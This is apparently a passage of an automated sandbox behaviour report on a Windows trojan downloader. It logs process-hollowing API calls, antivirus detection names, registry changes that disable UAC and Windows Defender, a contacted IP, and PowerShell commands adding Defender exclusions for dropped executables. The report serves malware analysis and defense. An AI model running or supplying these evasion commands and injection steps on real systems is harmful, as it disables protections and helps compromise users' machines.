000$0,040<0D0L0
base_address: 0x00436000
process_identifier: 5936
process_handle: 0x00000774
1 1 0

WriteProcessMemory

 buffer: @
base_address: 0xfffde008
process_identifier: 5936
process_handle: 0x00000774
1 1 0

WriteProcessMemory

 buffer: MZÿÿ¸@€º´ Í!¸LÍ!This program cannot be run in DOS mode. $PELr:k_à  hS$0@pjí  10äPÀ`ô À3ø.texth P`.data<o0p@`À.eh_framØ †@0@.bss„f°€`À.edata1 Œ@0@.idataä0Ž@0À.rsrcÀP¤@@.relocô `¨@0B
base_address: 0x00400000
process_identifier: 8532
process_handle: 0x0000077c
1 1 0

WriteProcessMemory

 buffer: zR| ˆ(Peÿÿ9A†A ƒC q AÃAÆHdeÿÿ,C h`|eÿÿ,C hx”eÿÿFC0BÌeÿÿFC0B¨fÿÿ>C0zzR| ˆ fÿÿaAƒC0| AÃA @`fÿÿaAƒC0| AÃA d¬fÿÿaAƒC0| AÃA ˆøfÿÿICZ E S E JzR| ˆÌÿÿzR| ˆàfÿÿ+C gzR| ˆ àfÿÿKD†A ƒ}ÃEÆ0@ gÿÿœA‡A †CƒH ‹Aà AÆAÇ,txgÿÿ\A†A ƒN ÃAÆA HÃAÆT¤¨gÿÿ…A…A ‡A†CƒE@M AÃAÆ AÇAÅA W EÃAÆ AÇAÅE 8üàgÿÿœA…A ‡C†CƒCPŒAÃAÆ AÇAÅ<8DhÿÿyA…A ‡F†AƒC@hAÃAÆ AÇAÅ4x„iÿÿþA‡A †AƒC Ø Aà AÆAÇA °Ljÿÿ‚AƒC x AÃA 4Ô¸jÿÿŠA‡A †AƒC0a Aà AÆAÇA 4 kÿÿŠA‡A †AƒC0a Aà AÆAÇA 4DhkÿÿœA‡A †AƒC0p Aà AÆAÇA zR| ˆ<¸kÿÿÑA…A ‡A†AƒC`0 CÃAÆ AÇAÅA zR| ˆ<@nÿÿ¸A…C ‡A†AƒC@ˆ AÃAÆ AÇAÅA <\ÀoÿÿqA…A ‡A†AƒCpt AÃAÆ AÇAÅA zR| ˆ<hxÿÿ`A…A ‡A†AƒC@2 AÃAÆ AÇAÅA zR| ˆ<pyÿÿ?A…B F‡†ƒÚ ÃAÆAÇAÅ A µ ÃAÆAÇAÅ A
base_address: 0x0042a000
process_identifier: 8532
process_handle: 0x0000077c
1 1 0

WriteProcessMemory

 buffer: r:k_( ( ( ( 
base_address: 0x00432000
process_identifier: 8532
process_handle: 0x0000077c
1 1 0

WriteProcessMemory

 buffer: €0€ HXPhäh4VS_VERSION_INFO½ïþ?ÈStringFileInfo¤040904b1, CommentsWkLW Rjlr(CompanyNameJeq8FileDescriptionFtH TRx0FileVersion3.6.3.7: InternalNameYjFX Hxl.exez+LegalCopyrightCopyright 2020 © YPO. All rights reserved.2LegalTrademarksVkaDB OriginalFilenameYjFX Hxl.exe2 ProductNameYjFX Hxl4ProductVersion3.4.1.48Assembly Version3.4.1.4DVarFileInfo$Translation PADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDING
base_address: 0x00435000
process_identifier: 8532
process_handle: 0x0000077c
1 1 0

WriteProcessMemory

 buffer: X 00 0+010;0E0¦0Ä0Ë0å0ñ0122K3W3¢3944y5T6?8¿8Ò9Ú9Z:;!=+=6=Ü=æ=ñ=­>í>!?+?6? `Î14<4{4’4¢4´4Æ4Ý4è4j55‘5£5µ5Ì5×5c6z6Š6œ6®6Å6Ð6R7i7y7‹77´7¿7p9:;:q:‡:—:§:Ç:å: ;ª<è?÷?0800+0¸0Ç0Ö0í0ÿ0¦1²1Æ1Ý1ï1!2,2M2\23333.393@3G3\3d3k3r3„33–33³3»3Â3É3Û3æ3í3ô3 444 424=4D4K4R5Y5o5y55–5ª5´5Ì5Ó5ç5î5ÿ566&6E6L6_6i66†6˜6¢6±6¸6Ð6Ý6ç6ö677+767W7i7©7»7Ñ7ã7!888N8f8¡8«8Â8Ø8é9ð9::!:(:@:L:h:o:Š:”:¤:«:µ:¼:å:ì:ý:;;%;9;F;R;Y;s;};„;;Ÿ;­;Õ;Ü;÷; <$<.<L<`<x<†<¢<´<Ã<Ö<ì<= ??I?]?d?Í?î?@$0,0N0»1Ø1ù1 232¸24(4L4]44š4Ë4A5G5T5¯5Ê5Ñ5Û5â5é5ñ5ø5 666,656?6F6M6Z6a6l6u6|6‰666¦6­6º6Á6Ì6Õ6Ü6é6ð677'7-747=7d7k7í7õ7ü7 888%8-848A8I8P8h8u88˜8¥8²8É8Õ8â8ø89(9/969U9j9:;:C:M:ò:;#;-;y;á;< <<<8<M<_<…<Ú<ö<1=H=‹=’=™=¥=¬=³=º=Ã=Ê=Ñ=Ø=å= >,>K>R>k>~>„>š>¦>«>±>K?T??˜?²?Ö?Ý?æ?ú?P r00†0‹0—0ž0¥0Y1h1w1í1 22+2;2H2T2e2t2ƒ2’2¡2°2¿2Î2Ý2ì2û2 3(3-3E3J3h3m33š3»3Þ3ã3³4º4×4é4 55!5(555=5I5P5a5i5q5x5˜5Ê5Õ5_<ü<Ì=>>F>K>X>Æ>ó>þ>?`?k?„?Œ?‘?ž?`P 000;0¸0Ñ0Ù0í12&202C2H2M2[2€2‡2£2½2 3Í4c68&8P8‘9#:Ò:Ç<==5=¼=>¿>£?¾?p, 0À455?5e5¬5N6©78‚:Š;Ã;à;ø;<ú<U=€„„0¦0ô2W3m3}3V5a6v6‰6“6À67~7ž7ü7S8Ú8æ899B9™9ý9::¾:Ä:Ú:á:ï:X;^;Ÿ;¥;»;Â;Î;Ú;!<^<â<è<þ<==‚=ˆ=É=Ï=å=ì=8>¶>Ã>ê>÷>?4?’?°?Ì?á?Ä 0$0<0T0l0„0œ0´0Ì0ä0ü01,1a1l11¤1©1³1Ý120262A2Ž2 3313D33—3Ë3Ó3è344;4k4s4—4Ÿ4ï4„66Ò6ß6ÿ67S7`7†7¢7¶7Â7Þ7æ788|89F9Ý9ˆ:£:;¯;<<Q<i<†<™<©<¸<Ó<ï<==='=7=[=¹=Á=‚>4?a?•?º?×?à?é?ò?û? |0 000(010:0C0L0+151­1 292©2¶2Å2÷263…3½3Ð3Ü3ö3þ34444i4‰4>5Š5’546’6 77g7o7_8s8‹8Â8Ê8Ù89V9z9´9»9Ð9å9:u:”:®:Î:K;°0Ì:¯;õ;<ž<ä<=§=Ë=>;>î>?&?E?­?Â?å?ÿ?Àx0¦0È0U1{1Ž1×1ã1ø12.2w2ƒ2˜2»2Î23#3M33²3Í3ø3#4N4y4¤4Ï4ú4#5J5s5ž5õ5 6˜8:9:;:¨:Þ:F<= =R=^=…=ø=G>[>‰>Î>?T?|??Ðhä0A1€1´1ç1$2T2‡2Ä2ô2'3d3”3Ç3484k4ë4ý5Z6™6Í67=7m7 7Ý7 8@8}8­8à89Q9„9:>;3<<Õ<!=>>u>?1?^?Û?ü?à<ï0º2]3ý5¥6ð6797x7¤7î78S8w8«8Ì8è89"9<9Z97<o>9?A?N?ð@ò1{33£3Í6ª7ñ9\:|:‹;Ÿ;³;†=’=ð=>>,>‡>“>ñ>? ?-?ˆ?”?ò?h0!0.0‰0•0ó01"1/1Ž1›1ê1þ12&2…2’2á2õ233x3„3 4ƒ::±:½:C;’;<=™=¥=ª=¯=´=¹=À=Ñ=î=û= >>%>9>>>U>,?4!6H7Æ7U8Ô8¥9à9‡:—;™<è<}= ?l?€?§?³? y0Ð1C2M2b2ü2›8"=0r<=¨=>Ô>à>@\…0à0ì0c1x1›1Å1ß1í122„3È34!4W4›4£4Ì4 5œ5À5á5÷56Y6Ü6ô6s7Â7q89¶:+;„;Ñ;2<—=Ñ=û=Ä?P A2 2`D}0Ð0]1d1­1´1ö13¥3¬3×3Þ34*4ƒ4Š4š4¡45„5‹5Æ6Í679>96<C<P<í<ô<pª=»=Ì=ƒ>>\?e?€p0¹778B8h8#98;æ;62F2v4}4 4Î3Õ34 474»4Â499þ;<m<s<€<*=<=W=B>U>b>®>µ>° ¨1¯1¤45m5M6Z6’8š8:µ:À G?k?Ð(1X1µ1¡2®2»2ž3ª3Ý3X7_79s=O>V>àY0ê4ñ4¦:¢;ø;)=H=ð(A3H3 4m5k7b9°<¾?Æ?Î?Ö?Þ?æ?î?ö?þ?¤0000&0.060>0F0N0V0^0f0n0v0~0†0Ž0–0ž0¦0®0¶0¾0Æ0Î0Ö0Þ0æ0î0ö0þ01111&1.161>1F1N1V1^1f1n1v1~1†1Ž1–1ž1¦1®1¶1¾1Æ1Î1Ö1Þ1æ1î1ö1þ12222&2.262>2F2N2V2^2f2n2v2~2†2Ž2–2ž2¦2®2¶2¾2Æ2Î2Ö2Þ2æ2î2ö2þ23333&3.363>3F3N3V3^3f3n3v3~3†3Ž3–3ž3¦3®3¶3¾3Æ3Î3Ö3Þ3æ3î3ö3þ34444&4.464>4F4N4V4^4f4n4v4~4†4Ž4–4ž4¦4®4¶4¾4Æ4Î4Ö4Þ4æ4î4ö4þ45555&5.565>5F5N5V5^5š56o6¿6 7>7E7K7y7®7µ7»7é78%8+8Ñ8 >>>/>6><>‡>Ç>Î>Ô>*?W?^?d?ö?ý?H0<1C1I1Ë2Ò2Ø254<4B4’4™4Ÿ4u8|8‚8ö:ý:;>;>E>W>a>°>¾>Ë>Ò>ú>?? 11161=1C1P4 ;¤;¨;¬;°;´;¸;¼;À;Ä;È;Ì;Ð;Ô;Ø;Ü;à;ä;è;ì;ð;ô;ø;ü;<<< <<<<< <$<(<,<0<4<8<<<@<D<H<L<`<d<h<l<p<t<x<|<€<== ===== =$=(=,=0=4=8=<=@=D=H=L=P=T=X=\=`=d=h=l=p=t=x=|=€=„=ˆ=Œ==”=˜=œ= =¤=¨=¬=°=´=¸=¼=À=Ä=È=Ì=Ð=Ô=Ø=Ü=à=ä=è=ì=ð=ô=ø=ü=>>> >>>>> >$>(>,>0>4>8><>@>D>H>L>À?Ä?È?Ì?Ð?Ô?Ø?Ü?à?ä?è?ì?ð?p°L0P0T0X0\0`0d0h0l0p0t0¤6¨6¬6°6´6¸6¼6À6Ä6È6Ì6Ð6 77777 7::: :$:(:,:0:4:8:<:@:D:H:L:P:T:X:\:`:d:h:l:p:t:x:|:€:„:ˆ:Œ::”:˜:œ: :¤:¨:¬:°:´:¸:¼:À:Ä:È:Ì:Ð:Ô:Ø:Ü:à:ä:è:€0 000$0,040<0D0L0
base_address: 0x00436000
process_identifier: 8532
process_handle: 0x0000077c
1 1 0

WriteProcessMemory

 buffer: @
base_address: 0xfffde008
process_identifier: 8532
process_handle: 0x0000077c
1 1 0
Time & API Arguments Status Return Repeated

WriteProcessMemory

 buffer: MZÿÿ¸@€º´ Í!¸LÍ!This program cannot be run in DOS mode. $PELr:k_à  hS$0@pjí  10äPÀ`ô À3ø.texth P`.data<o0p@`À.eh_framØ †@0@.bss„f°€`À.edata1 Œ@0@.idataä0Ž@0À.rsrcÀP¤@@.relocô `¨@0B
base_address: 0x00400000
process_identifier: 2576
process_handle: 0x000007ec
1 1 0

WriteProcessMemory

 buffer: MZÿÿ¸@€º´ Í!¸LÍ!This program cannot be run in DOS mode. $PELr:k_à  hS$0@pjí  10äPÀ`ô À3ø.texth P`.data<o0p@`À.eh_framØ †@0@.bss„f°€`À.edata1 Œ@0@.idataä0Ž@0À.rsrcÀP¤@@.relocô `¨@0B
base_address: 0x00400000
process_identifier: 5936
process_handle: 0x00000774
1 1 0

WriteProcessMemory

 buffer: MZÿÿ¸@€º´ Í!¸LÍ!This program cannot be run in DOS mode. $PELr:k_à  hS$0@pjí  10äPÀ`ô À3ø.texth P`.data<o0p@`À.eh_framØ †@0@.bss„f°€`À.edata1 Œ@0@.idataä0Ž@0À.rsrcÀP¤@@.relocô `¨@0B
base_address: 0x00400000
process_identifier: 8532
process_handle: 0x0000077c
1 1 0
FireEye Generic.mg.6640bb72348963f4
McAfee Artemis!6640BB723489
AegisLab Trojan.Multi.Generic.4!c
Sangfor Trojan.Win32.Save.a
Cyren W32/MSIL_Agent.BZW.gen!Eldorado
Symantec ML.Attribute.HighConfidence
ESET-NOD32 a variant of MSIL/TrojanDownloader.Agent.ICX
APEX Malicious
Kaspersky UDS:DangerousObject.Multi.Generic
Avast Win32:MalwareX-gen [Trj]
McAfee-GW-Edition Artemis!Trojan
Microsoft Trojan:Win32/Wacatac.B!ml
ViRobot Trojan.Win32.S.Agent.34600
ZoneAlarm UDS:DangerousObject.Multi.Generic
BitDefenderTheta Gen:NN.ZemsilCO.34758.cm1@amQgN6d
SentinelOne Static AI - Malicious PE
AVG Win32:MalwareX-gen [Trj]
Process injection Process 996 called NtSetContextThread to modify thread in remote process 2576
Process injection Process 3632 called NtSetContextThread to modify thread in remote process 5936
Process injection Process 6496 called NtSetContextThread to modify thread in remote process 8532
Time & API Arguments Status Return Repeated

NtSetContextThread

 registers.eip: 0
registers.esp: 0
registers.edi: 0
registers.eax: 4203603
registers.ebp: 0
registers.edx: 0
registers.ebx: -139264
registers.esi: 0
registers.ecx: 0
thread_handle: 0x000007f0
process_identifier: 2576
1 0 0

NtSetContextThread

 registers.eip: 0
registers.esp: 0
registers.edi: 0
registers.eax: 4203603
registers.ebp: 0
registers.edx: 0
registers.ebx: -139264
registers.esi: 0
registers.ecx: 0
thread_handle: 0x00000778
process_identifier: 5936
1 0 0

NtSetContextThread

 registers.eip: 0
registers.esp: 0
registers.edi: 0
registers.eax: 4203603
registers.ebp: 0
registers.edx: 0
registers.ebx: -139264
registers.esi: 0
registers.ecx: 0
thread_handle: 0x00000780
process_identifier: 8532
1 0 0
Process injection Process 996 resumed a thread in remote process 2576
Process injection Process 3632 resumed a thread in remote process 5936
Process injection Process 6496 resumed a thread in remote process 8532
Time & API Arguments Status Return Repeated

NtResumeThread

 thread_handle: 0x000007f0
suspend_count: 1
process_identifier: 2576
1 0 0

NtResumeThread

 thread_handle: 0x00000778
suspend_count: 1
process_identifier: 5936
1 0 0

NtResumeThread

 thread_handle: 0x00000780
suspend_count: 1
process_identifier: 8532
1 0 0
registry HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows Defender\Spynet
file C:\Windows\System32\ie4uinit.exe
file C:\Program Files\Windows Sidebar\sidebar.exe
file C:\Windows\System32\WindowsAnytimeUpgradeUI.exe
file C:\Windows\System32\xpsrchvw.exe
file C:\Windows\System32\displayswitch.exe
file C:\Program Files\Common Files\Microsoft Shared\ink\mip.exe
file C:\Windows\System32\mblctr.exe
file C:\Windows\System32\mstsc.exe
file C:\Windows\System32\SnippingTool.exe
file C:\Windows\System32\SoundRecorder.exe
file C:\Windows\System32\dfrgui.exe
file C:\Windows\System32\msinfo32.exe
file C:\Program Files\Common Files\Microsoft Shared\ink\ShapeCollector.exe
file C:\Program Files\Windows Journal\Journal.exe
file C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
file C:\Windows\System32\MdSched.exe
file C:\Windows\System32\msconfig.exe
file C:\Windows\System32\recdisc.exe
file C:\Windows\System32\msra.exe
file C:\Windows\System32\rstrui.exe
dead_host 95.90.186.169:3606
description attempts to disable user access control registry HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA
description attempts to modify windows defender policies registry HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableOnAccessProtection
description attempts to modify windows defender policies registry HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableBehaviorMonitoring
description attempts to modify windows defender policies registry HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\DisableAntiSpyware
description attempts to modify windows defender policies registry HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableScanOnRealtimeEnable
Time & API Arguments Status Return Repeated

NtResumeThread

 thread_handle: 0x000000dc
suspend_count: 1
process_identifier: 996
1 0 0

NtResumeThread

 thread_handle: 0x00000150
suspend_count: 1
process_identifier: 996
1 0 0

NtResumeThread

 thread_handle: 0x00000194
suspend_count: 1
process_identifier: 996
1 0 0

NtResumeThread

 thread_handle: 0x00000590
suspend_count: 1
process_identifier: 996
1 0 0

NtResumeThread

 thread_handle: 0x000005e0
suspend_count: 1
process_identifier: 996
1 0 0

NtGetContextThread

 thread_handle: 0x000000e0
1 0 0

NtResumeThread

 thread_handle: 0x000000e0
suspend_count: 1
process_identifier: 996
1 0 0

NtGetContextThread

 thread_handle: 0x000000e0
1 0 0

NtGetContextThread

 thread_handle: 0x000000e0
1 0 0

NtResumeThread

 thread_handle: 0x000000e0
suspend_count: 1
process_identifier: 996
1 0 0

NtResumeThread

 thread_handle: 0x0000043c
suspend_count: 1
process_identifier: 996
1 0 0

CreateProcessInternalW

 thread_identifier: 5096
thread_handle: 0x00000698
process_identifier: 7232
current_directory: C:\Users\test22\AppData\Local\Temp
filepath: C:\Users\test22\AppData\Local\Temp\b4e0ccc1-38c6-4956-8f3c-173d66156970\AdvancedRun.exe
track: 1
command_line: "C:\Users\test22\AppData\Local\Temp\b4e0ccc1-38c6-4956-8f3c-173d66156970\AdvancedRun.exe" /EXEFilename "C:\Users\test22\AppData\Local\Temp\b4e0ccc1-38c6-4956-8f3c-173d66156970\test.bat" /WindowState ""0"" /PriorityClass ""32"" /CommandLine "" /StartDirectory "" /RunAs 8 /Run
filepath_r: C:\Users\test22\AppData\Local\Temp\b4e0ccc1-38c6-4956-8f3c-173d66156970\AdvancedRun.exe
stack_pivoted: 0
creation_flags: 67634192 (CREATE_DEFAULT_ERROR_MODE|CREATE_NEW_CONSOLE|CREATE_UNICODE_ENVIRONMENT|EXTENDED_STARTUPINFO_PRESENT)
inherit_handles: 0
process_handle: 0x0000069c
1 1 0

NtResumeThread

 thread_handle: 0x00000680
suspend_count: 1
process_identifier: 996
1 0 0

CreateProcessInternalW

 thread_identifier: 8264
thread_handle: 0x000006d0
process_identifier: 7112
current_directory: C:\Users\test22\AppData\Local\Temp
filepath: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
track: 1
command_line: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\test22\AppData\Local\Temp\HostStartups.exe" -Force
filepath_r: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
stack_pivoted: 0
creation_flags: 67634192 (CREATE_DEFAULT_ERROR_MODE|CREATE_NEW_CONSOLE|CREATE_UNICODE_ENVIRONMENT|EXTENDED_STARTUPINFO_PRESENT)
inherit_handles: 0
process_handle: 0x000006e4
1 1 0

NtResumeThread

 thread_handle: 0x000006ec
suspend_count: 1
process_identifier: 996
1 0 0

CreateProcessInternalW

 thread_identifier: 5272
thread_handle: 0x000006f8
process_identifier: 8300
current_directory: C:\Users\test22\AppData\Local\Temp
filepath: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
track: 1
command_line: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\test22\AppData\Local\Temp\HostStartups.exe" -Force
filepath_r: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
stack_pivoted: 0
creation_flags: 67634192 (CREATE_DEFAULT_ERROR_MODE|CREATE_NEW_CONSOLE|CREATE_UNICODE_ENVIRONMENT|EXTENDED_STARTUPINFO_PRESENT)
inherit_handles: 0
process_handle: 0x00000718
1 1 0

NtResumeThread

 thread_handle: 0x0000070c
suspend_count: 1
process_identifier: 996
1 0 0

CreateProcessInternalW

 thread_identifier: 4780
thread_handle: 0x00000718
process_identifier: 2508
current_directory: C:\Users\test22\AppData\Local\Temp
filepath: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
track: 1
command_line: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\test22\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\t14b8IM7c0bA4XfaOfnc1hcOur946lf69o15K4.exe" -Force
filepath_r: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
stack_pivoted: 0
creation_flags: 67634192 (CREATE_DEFAULT_ERROR_MODE|CREATE_NEW_CONSOLE|CREATE_UNICODE_ENVIRONMENT|EXTENDED_STARTUPINFO_PRESENT)
inherit_handles: 0
process_handle: 0x00000730
1 1 0

NtResumeThread

 thread_handle: 0x00000724
suspend_count: 1
process_identifier: 996
1 0 0

CreateProcessInternalW

 thread_identifier: 5992
thread_handle: 0x00000728
process_identifier: 4376
current_directory: C:\Users\test22\AppData\Local\Temp
filepath: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
track: 1
command_line: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\test22\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\t14b8IM7c0bA4XfaOfnc1hcOur946lf69o15K4.exe" -Force
filepath_r: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
stack_pivoted: 0
creation_flags: 67634192 (CREATE_DEFAULT_ERROR_MODE|CREATE_NEW_CONSOLE|CREATE_UNICODE_ENVIRONMENT|EXTENDED_STARTUPINFO_PRESENT)
inherit_handles: 0
process_handle: 0x00000748
1 1 0

NtResumeThread

 thread_handle: 0x0000073c
suspend_count: 1
process_identifier: 996
1 0 0

CreateProcessInternalW

 thread_identifier: 6324
thread_handle: 0x00000748
process_identifier: 4764
current_directory: C:\Users\test22\AppData\Local\Temp
filepath: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
track: 1
command_line: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\test22\AppData\Local\Temp\HostStartups.exe" -Force
filepath_r: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
stack_pivoted: 0
creation_flags: 67634192 (CREATE_DEFAULT_ERROR_MODE|CREATE_NEW_CONSOLE|CREATE_UNICODE_ENVIRONMENT|EXTENDED_STARTUPINFO_PRESENT)
inherit_handles: 0
process_handle: 0x00000760
1 1 0

NtResumeThread

 thread_handle: 0x00000754
suspend_count: 1
process_identifier: 996
1 0 0

CreateProcessInternalW

 thread_identifier: 7184
thread_handle: 0x00000750
process_identifier: 3632
current_directory: C:\Users\test22\AppData\Local\Temp
filepath: C:\Users\test22\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\t14b8IM7c0bA4XfaOfnc1hcOur946lf69o15K4.exe
track: 1
command_line: "C:\Users\test22\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\t14b8IM7c0bA4XfaOfnc1hcOur946lf69o15K4.exe"
filepath_r: C:\Users\test22\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\t14b8IM7c0bA4XfaOfnc1hcOur946lf69o15K4.exe
stack_pivoted: 0
creation_flags: 67634192 (CREATE_DEFAULT_ERROR_MODE|CREATE_NEW_CONSOLE|CREATE_UNICODE_ENVIRONMENT|EXTENDED_STARTUPINFO_PRESENT)
inherit_handles: 0
process_handle: 0x00000774
1 1 0

NtResumeThread

 thread_handle: 0x00000748
suspend_count: 1
process_identifier: 996
1 0 0

CreateProcessInternalW

 thread_identifier: 7804
thread_handle: 0x00000750
process_identifier: 8604
current_directory: C:\Users\test22\AppData\Local\Temp
filepath: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
track: 1
command_line: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Windows\Resources\Themes\aero\Shell\5ev6d0b9739921ve54Sd\svchost.exe" -Force
filepath_r: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
stack_pivoted: 0
creation_flags: 67634192 (CREATE_DEFAULT_ERROR_MODE|CREATE_NEW_CONSOLE|CREATE_UNICODE_ENVIRONMENT|EXTENDED_STARTUPINFO_PRESENT)
inherit_handles: 0
process_handle: 0x00000790
1 1 0

NtResumeThread

 thread_handle: 0x00000784
suspend_count: 1
process_identifier: 996
1 0 0

CreateProcessInternalW

 thread_identifier: 9060
thread_handle: 0x0000078c
process_identifier: 7352
current_directory: C:\Users\test22\AppData\Local\Temp
filepath: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
track: 1
command_line: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\test22\AppData\Local\Temp\HostStartups.exe" -Force
filepath_r: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
stack_pivoted: 0
creation_flags: 67634192 (CREATE_DEFAULT_ERROR_MODE|CREATE_NEW_CONSOLE|CREATE_UNICODE_ENVIRONMENT|EXTENDED_STARTUPINFO_PRESENT)
inherit_handles: 0
process_handle: 0x000007a8
1 1 0

NtResumeThread

 thread_handle: 0x0000079c
suspend_count: 1
process_identifier: 996
1 0 0

CreateProcessInternalW

 thread_identifier: 5264
thread_handle: 0x000007a0
process_identifier: 3292
current_directory: C:\Users\test22\AppData\Local\Temp
filepath: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
track: 1
command_line: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Windows\Resources\Themes\aero\Shell\5ev6d0b9739921ve54Sd\svchost.exe" -Force
filepath_r: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
stack_pivoted: 0
creation_flags: 67634192 (CREATE_DEFAULT_ERROR_MODE|CREATE_NEW_CONSOLE|CREATE_UNICODE_ENVIRONMENT|EXTENDED_STARTUPINFO_PRESENT)
inherit_handles: 0
process_handle: 0x000007c0
1 1 0

NtResumeThread

 thread_handle: 0x000007dc
suspend_count: 1
process_identifier: 996
1 0 0

CreateProcessInternalW

 thread_identifier: 1388
thread_handle: 0x000007e4
process_identifier: 1404
current_directory: C:\Users\test22\AppData\Local\Temp
filepath: C:\Windows\System32\cmd.exe
track: 1
command_line: "C:\Windows\System32\cmd.exe" /c timeout 1
filepath_r: C:\Windows\System32\cmd.exe
stack_pivoted: 0
creation_flags: 67634192 (CREATE_DEFAULT_ERROR_MODE|CREATE_NEW_CONSOLE|CREATE_UNICODE_ENVIRONMENT|EXTENDED_STARTUPINFO_PRESENT)
inherit_handles: 0
process_handle: 0x000007fc
1 1 0

CreateProcessInternalW

 thread_identifier: 7640
thread_handle: 0x000007f0
process_identifier: 2576
current_directory:
filepath: C:\Users\test22\AppData\Local\Temp\HostStartups.exe
track: 1
command_line:
filepath_r: C:\Users\test22\AppData\Local\Temp\HostStartups.exe
stack_pivoted: 0
creation_flags: 134217732 (CREATE_NO_WINDOW|CREATE_SUSPENDED)
inherit_handles: 0
process_handle: 0x000007ec
1 1 0

NtGetContextThread

 thread_handle: 0x000007f0
1 0 0

NtAllocateVirtualMemory

 process_identifier: 2576
region_size: 225280
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 0
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x00400000
allocation_type: 12288 (MEM_COMMIT|MEM_RESERVE)
process_handle: 0x000007ec
1 0 0

WriteProcessMemory

 buffer: MZÿÿ¸@€º´ Í!¸LÍ!This program cannot be run in DOS mode. $PELr:k_à  hS$0@pjí  10äPÀ`ô À3ø.texth P`.data<o0p@`À.eh_framØ †@0@.bss„f°€`À.edata1 Œ@0@.idataä0Ž@0À.rsrcÀP¤@@.relocô `¨@0B
base_address: 0x00400000
process_identifier: 2576
process_handle: 0x000007ec
1 1 0

WriteProcessMemory

 buffer:
base_address: 0x00401000
process_identifier: 2576
process_handle: 0x000007ec
1 1 0

WriteProcessMemory

 buffer:
base_address: 0x00423000
process_identifier: 2576
process_handle: 0x000007ec
1 1 0

WriteProcessMemory

 buffer: zR| ˆ(Peÿÿ9A†A ƒC q AÃAÆHdeÿÿ,C h`|eÿÿ,C hx”eÿÿFC0BÌeÿÿFC0B¨fÿÿ>C0zzR| ˆ fÿÿaAƒC0| AÃA @`fÿÿaAƒC0| AÃA d¬fÿÿaAƒC0| AÃA ˆøfÿÿICZ E S E JzR| ˆÌÿÿzR| ˆàfÿÿ+C gzR| ˆ àfÿÿKD†A ƒ}ÃEÆ0@ gÿÿœA‡A †CƒH ‹Aà AÆAÇ,txgÿÿ\A†A ƒN ÃAÆA HÃAÆT¤¨gÿÿ…A…A ‡A†CƒE@M AÃAÆ AÇAÅA W EÃAÆ AÇAÅE 8üàgÿÿœA…A ‡C†CƒCPŒAÃAÆ AÇAÅ<8DhÿÿyA…A ‡F†AƒC@hAÃAÆ AÇAÅ4x„iÿÿþA‡A †AƒC Ø Aà AÆAÇA °Ljÿÿ‚AƒC x AÃA 4Ô¸jÿÿŠA‡A †AƒC0a Aà AÆAÇA 4 kÿÿŠA‡A †AƒC0a Aà AÆAÇA 4DhkÿÿœA‡A †AƒC0p Aà AÆAÇA zR| ˆ<¸kÿÿÑA…A ‡A†AƒC`0 CÃAÆ AÇAÅA zR| ˆ<@nÿÿ¸A…C ‡A†AƒC@ˆ AÃAÆ AÇAÅA <\ÀoÿÿqA…A ‡A†AƒCpt AÃAÆ AÇAÅA zR| ˆ<hxÿÿ`A…A ‡A†AƒC@2 AÃAÆ AÇAÅA zR| ˆ<pyÿÿ?A…B F‡†ƒÚ ÃAÆAÇAÅ A µ ÃAÆAÇAÅ A
base_address: 0x0042a000
process_identifier: 2576
process_handle: 0x000007ec
1 1 0

WriteProcessMemory

 buffer: r:k_( ( ( ( 
base_address: 0x00432000
process_identifier: 2576
process_handle: 0x000007ec
1 1 0

WriteProcessMemory

 buffer:
base_address: 0x00433000
process_identifier: 2576
process_handle: 0x000007ec
1 1 0

WriteProcessMemory

